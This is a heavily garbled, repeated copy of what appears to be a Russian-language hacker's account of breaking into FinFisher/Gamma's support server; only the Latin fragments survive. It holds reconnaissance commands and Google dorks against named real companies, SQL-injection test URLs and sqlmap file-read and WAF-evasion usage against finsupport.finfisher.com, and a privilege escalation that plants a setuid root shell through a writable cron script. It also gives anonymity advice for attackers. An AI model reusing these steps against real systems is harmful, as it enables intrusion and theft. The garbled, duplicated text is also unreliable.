Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

  C:\Documents and Settings\\Local Settings\Temp\   -     .      Dynamic forking (Process hollowing),             ,   .                  ( ,     ).        MBR    .           C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} ,   ,  ,  (    -),    Skype   .             IP (     77.69.140.194)   22, 53, 80, 443, 4111 (  -   ). 
 
     : 
 
   40            Skype (, ,  , ,  )      (email, , VoIP)     -                          (Windows, Mac OSX  Linux) 
 
        ,   FinFisher     .     ,       ,        . 
 
       .      ,    -     -.               . 
 
        . 
 
     
 
 ,    - - ,       : 
 
          Truecrypt 7.1a .     Whonix .     Debian,           Tor.    ,  Whonix       Tor,  - ,        -.         aircrack-ng  reaver,     cantenna. 
 
          Whonix,    - ,      ,              ,   -    .      -      . 
 
 : ,        Tor.    ,   -,      -     nmap, sqlmap  nikto,       ,  Tor   .           VPS.     Tor      , ,   ,     . 
 
   
 
      fierce ,       whois-  IP-   . 
 
       Blackwater.     -     (academi.com).   : 
 
 fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com 
 
   whois-   www.academi.com      ,     Amazon Web Service. 
 
 NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd 
 
 whois-  academi.com  ,        ( 850 Puddin Ridge Rd ),        whois-. ,         ,      Google: 
 
 "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools 
 
    IP-,   fierce.pl    ,  fierce.pl -dns -    IP-.      ,     ,   . 
 
     Google       . ,  academi.com    , -    : 
 
 54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com 
 
   whois-    ,  academiproshop.com     ,       . 
 
   FinFisher    finsupport.finfisher.com    whois-  finfisher.com ,       " FinFisher GmbH ".  "FinFisher GmbH" inurl:domaintools  gamma-international.de ,    finsupport.finfisher.com . 
 
  ,     . ,      ,    ,    ,       . 
 
    
 
  nmap-   IP-      .         SNMP-. 
 
       : 
 
     -,    ?    ,    ,    ,    URL  IP     .    fierce    git-,    git.companyname.come/gitweb/        .    ? ,   FTP-,            .        .    (VOIP-, IP-, ...)       .          ? 
 
 -    .  ,  ,  nmap    ,    : 
 
   -.   fierce ,       ,  test.company.com  dev.company.com    ,     .  nikto .      webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php       . ,     .    WhatWeb .         ,  wpscan , CMS-Explorer  Joomscan .    ,         .    ,    .  - -      ,    ,    .         ZAP       .           .    ,       .   ,   .         ,       ,       ( ),   Google     ,         . 
 
  finsupport.finfisher.com   : 
 
    nikto .   .   .     SQL-.  WhatWeb     . WhatWeb   ,   ,    , -  ,   Gamma    ,    ?     ,   URL,     ( index.php ,   ,   ).   Scripts/scripts.js.php    Google: allinurl:"Scripts/scripts.js.php" ,    ,    ,    -. ,      ,        .            . 
 
        ,     - : "   ,      -    ,     Gamma Group... " 
    ,     ,    ,   .    : 
 
     Google: allinurl:"Scripts/scripts.js.php" ,     SQL-   ,   . ,  -  Apache ModSecurity ,    sqlmap   --tamper='tamper/modsecurityversioned.py'     ,   ,  PHP- (          JavaScript-)     -. 
 
   , ,          . 
 
      .     : , LFI,      JavaScript-,      -           Location,                 . 
 
    finsupport .    /BackOffice/  403 Forbidden ,           SQL- (    ).         print.php ,      
 
 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 
 
   ,  print.php   ,    .         !   MySQL       . ,      magicquotes ,         MySQL- INTO OUTFILE .     ,   sqlmap --file-read    PHP-   URL      -,   HTML-,         PHP-    HTML-,     . 
 
   ,  ,       ,        .           ,        . 
 
   (  ) 
 
 ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^ 
 
   root  50% Linux-         : Linux_Exploit_Suggester  unix-privesc-check . 
 
  finsupport     Debian,        ,  unix-privesc-check : 
 
 WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer 
 
  /etc/cron.hourly/webalizer    : 
 
 chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell 
 
  ,  ... . ,   cron       .     webalizer ,  ,      . ,      cron     ,      ,         cron . ls -l /etc/localtime ,     6- ,     webalizer   ,  , ,     .    , ,    , -   ,       ,   . Root-     ,       . 
 
   
 
      ,     .           ,   ,         .       nmap    .     nse-   nfs-*   smb-* .       finsupport -    -,   qateam ,        . 
 
  
 
   ,      .   .      .   : 
 
  Gamma      FinSpy          FinSpy C&C  ,     C&C -         ,   ,        C&C -  FinFisher     C&C -    DDoS- Gamma Group . 
 
    Gamma      ,      ,      FinSpy ,     ,   ,        ,           Twitter-. 
 
 :       ,     GPU   FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 )   ,       ! 
 
   
 
    ,          ,   ,    .    ,    . 
 
 1)   -, Java , Flash  Microsoft Office      email-,            .   ,            / Java / Flash . 
 
      ,   ,      ,     0day-    FinSploit  VUPEN ,   .            -,       .   Metasploit-browser autopwn -, ,  ,       ,    Flash -. 
 
 2)  ,   95%   ,    .        : " ".      ,        ,      ,    . 
 
  
 
       40        .   ,     PGP-  ,      .           GitHub,    : https://github.com/FinFisher . 
 
  : 
 
 Hacker News Reddit 
 
   
 
 https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers (    ) https://www.corelan.be/ (  Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/ 
 
 : 
 
 The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated 

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

